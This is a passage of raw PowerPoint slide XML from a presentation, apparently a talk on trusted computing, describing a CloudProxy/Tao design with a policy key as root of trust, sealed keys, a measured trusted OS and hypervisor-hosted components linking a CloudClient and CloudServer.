              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establish SSL channel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-457200">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authenticate program and isolation regime</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="1558870"/>
            <a:ext cx="1905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Policy Public Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="Slide1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1101670"/>
            <a:ext cx="2971800" cy="2228850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="18" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8193733" y="2890137"/>
            <a:ext cx="528934"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9346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60637" y="-51486"/>
            <a:ext cx="1193662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4400" kern="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Operation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="1905000" cy="9144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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CloudClient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FA32F8ED-EEB4-4D51-9E8E-3B145D9B9811}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686800" y="1371600"/>
            <a:ext cx="1905000" cy="9906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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CloudServer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="1981200"/>
            <a:ext cx="1828800"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 name="Can 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9313723" y="3429000"/>
            <a:ext cx="1219200" cy="18288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Can 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8153400" y="2891135"/>
            <a:ext cx="1066800" cy="842665"/>
          </a:xfrm>
          <a:prstGeom prst="can">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8141119" y="3148915"/>
            <a:ext cx="1083951" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My Keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9313723" y="4038600"/>
            <a:ext cx="1231427" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(encrypted)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="3" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9389923" y="2895600"/>
            <a:ext cx="1066800"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8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8686800" y="2362200"/>
            <a:ext cx="76200" cy="528934"/>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360264" y="2819400"/>
            <a:ext cx="5964336" cy="4038600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>End state</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Programs have access to unsealed private keys and symmetric keys (to encrypt/integrity protect files, etc)</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Program can use it’s private key to authenticate identity and isolation regime</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Program can do authentication and authorization rooted in policy key</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Trusted programs have authenticated, encrypted integrity protected channel to communicate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686800" y="1166336"/>
            <a:ext cx="1905000" cy="58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Policy Public Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="1242536"/>
            <a:ext cx="1905000" cy="58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Policy Public Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="4938712"/>
            <a:ext cx="4267200" cy="1600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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All trust rooted in “Policy Key”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>All private keys sealed to code identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Policy key is part of identity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25" descr="Slide1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="895867"/>
            <a:ext cx="2971800" cy="2228850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3100167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4"/>
            <a:ext cx="12192000" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A Trusted OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290286" y="1302327"/>
            <a:ext cx="7939314" cy="5555672"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Simplified Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OS support for Tao services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tcService</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Kernel changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="4" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>encrypted swap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="4" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application identity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="4" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>     tied to Tao services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Initramfs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Encapsulated initial </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>       file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Measured at boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Contains apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module loading restrictions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Don’t mount file systems as trusted</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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Slide1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="1676400"/>
            <a:ext cx="4433886" cy="2895600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="4648200"/>
            <a:ext cx="4005574" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Isolation: One trusted app per OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16444548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1676400" y="3886200"/>
            <a:ext cx="4038600" cy="6096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Hypervisor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="2514600"/>
            <a:ext cx="35052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OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="1676400"/>
            <a:ext cx="1752600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ACFF0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latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CloudServer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1676400"/>
            <a:ext cx="1905000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ACFF0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latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CloudClient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="3200400"/>
            <a:ext cx="1600200" cy="4572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Hv tcService</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3047603" y="3504803"/>
            <a:ext cx="76200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4763294" y="3771106"/>
            <a:ext cx="2286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733800" y="5867401"/>
            <a:ext cx="5115503"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Hypervisor hosted CloudProxy components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="4648200"/>
            <a:ext cx="4191000" cy="6096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Hardware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3886200"/>
            <a:ext cx="3962400" cy="6096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Hypervisor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="1676400"/>
            <a:ext cx="11430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OS tcService</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="1981200"/>
            <a:ext cx="2286000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175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638801" y="1447800"/>
            <a:ext cx="896399" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2148443" y="2377043"/>
            <a:ext cx="27432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bwMode="auto">
          <a:xfrm>
            <a:off x="6934200" y="2514600"/>
            <a:ext cx="35052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OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3200400"/>
            <a:ext cx="1600200" cy="4572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Hv tcService</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Connector 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
